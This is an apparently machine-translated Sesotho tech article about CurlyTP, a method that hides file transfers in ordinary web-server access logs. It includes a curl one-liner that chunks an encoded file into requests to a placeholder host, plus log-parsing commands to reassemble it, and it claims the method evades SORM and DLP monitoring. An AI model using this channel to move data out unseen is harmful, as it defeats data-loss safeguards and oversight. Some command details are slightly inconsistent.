Ho latela tlhaloso ea Wikipedia, lerotholi le shoeleng ke sesebelisoa sa bolotsana se sebeletsang ho fapanyetsana tlhahisoleseling kapa lintho tse ling pakeng tsa batho ba sebelisang sebaka sa lekunutu. Maikutlo ke hore batho ha ba kopane - empa ba ntse ba fapanyetsana tlhahisoleseling ho boloka polokeho ea ts'ebetso.

Sebaka sa ho ipata ha sea lokela ho hohela tlhokomelo. Ka hona, lefatšeng le sa sebetseng hangata ba sebelisa lintho tse masene: setene se hlephileng leboteng, buka ea laeborari kapa sekoti sefateng.

Ho na le lisebelisoa tse ngata tsa encryption le tse sa tsejoeng inthaneteng, empa 'nete ea ho sebelisa lisebelisoa tsena e hohela tlhokomelo. Ho feta moo, ba ka 'na ba thibeloa boemong ba mekhatlo kapa mmuso. Se o lokelang ho se etsa?

Moqapi Ryan Flowers o hlahisitse khetho e khahlisang - sebelisa seva efe kapa efe ea tepo joalo ka sebaka sa ho ipata. Haeba u nahana ka eona, seva sa marang-rang se etsa eng? E amohela likopo, e fana ka lifaele le ho ngola li-log. 'Me e boloka likopo tsohle, esita le tse fosahetseng!

Hoa etsahala hore leha e le efe seva sa marang-rang se u lumella ho boloka hoo e batlang e le molaetsa ofe kapa ofe ho log. Lipalesa li ne li ipotsa hore na li ka sebelisoa joang.

O fana ka khetho ena:

1. Nka faele ea mongolo (molaetsa oa lekunutu) 'me u bale hash (md5sum).
2. Re e khoute (gzip+uuencode).
3. Re ngolla log re sebelisa kopo e fosahetseng ka boomo ho seva.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Ho bala faele, o hloka ho etsa lits'ebetso tsena ka tatellano e fapaneng: decode le unzip faele, hlahloba hash (hash e ka fetisoa ka mokhoa o sireletsehileng liteisheneng tse bulehileng).

Libaka li nkeloa sebaka ke =+=hore ho se be le libaka atereseng. Lenaneo, leo mongoli a le bitsang CurlyTP, le sebelisa encoding ea base64, joalo ka li-attachments tsa imeile. Kopo e etsoa ka lentsoe la sehlooho ?transfer?e le hore moamoheli a ka e fumana habonolo likutung.

Re bona eng ka har'a lifate tabeng ee?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Joalokaha ho se ho boletsoe, ho fumana molaetsa oa lekunutu o hloka ho etsa ts'ebetso ka tatellano e fapaneng:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Tshebetso e bonolo ho iketsetsa. Md5sum e tsamaisana, 'me likahare tsa faele li tiisa hore ntho e' ngoe le e 'ngoe e khethiloe ka nepo.

Mokhoa o bonolo haholo. "Morero oa boikoetliso bona ke ho paka feela hore lifaele li ka fetisoa ka likopo tse nyane tse se nang molato tsa webosaete, 'me e sebetsa ho seva efe kapa efe ea webo e nang le lingoloa tse hlakileng. Ha e le hantle, setsi se seng le se seng sa marang-rang ke sebaka sa ho ipata!” oa ngola Flowers.

Ehlile, mokhoa ona o sebetsa feela haeba moamoheli a na le phihlello ea li-log tsa seva. Empa phihlello e joalo e fanoa, ka mohlala, ke batho ba bangata ba amohelang baeti.

Joang ho e sebelisa?

Ryan Flowers o re ha se setsebi sa ts'ireletso ea tlhahisoleseding mme a ke ke a bokella lethathamo la lisebelisoa tse ka sebelisoang bakeng sa CurlyTP. Ho eena, ke bopaki ba maikutlo a hore lisebelisoa tse tloaelehileng tseo re li bonang letsatsi le leng le le leng li ka sebelisoa ka tsela e sa tloaelehang.

Ha e le hantle, mokhoa ona o na le melemo e mengata ho feta seva se seng se "pata" joalo ka Digital Dead Drop kapa PirateBox: ha e hloke tlhophiso e khethehileng lehlakoreng la seva kapa liprothokholo tse khethehileng - 'me e ke ke ea tsosa lipelaelo har'a ba shebileng sephethephethe. Ha ho na monyetla oa hore sistimi ea SORM kapa DLP e hlahlobe li-URL bakeng sa lifaele tsa mongolo tse hatisitsoeng.

Ena ke e 'ngoe ea litsela tsa ho fetisa melaetsa ka lifaele tsa tšebeletso. U ka hopola hore na lik'hamphani tse ling tse tsoetseng pele li ne li beha joang Mesebetsi ea Baetsi ho Lihlooho tsa HTTP kapa ka khoutu ea maqephe a HTML.

Khopolo e ne e le hore ke baetsi ba marang-rang feela ba tla bona lehe lena la Paseka, kaha motho ea tloaelehileng a ke ke a sheba lihlooho kapa khoutu ea HTML.

Source: www.habr.com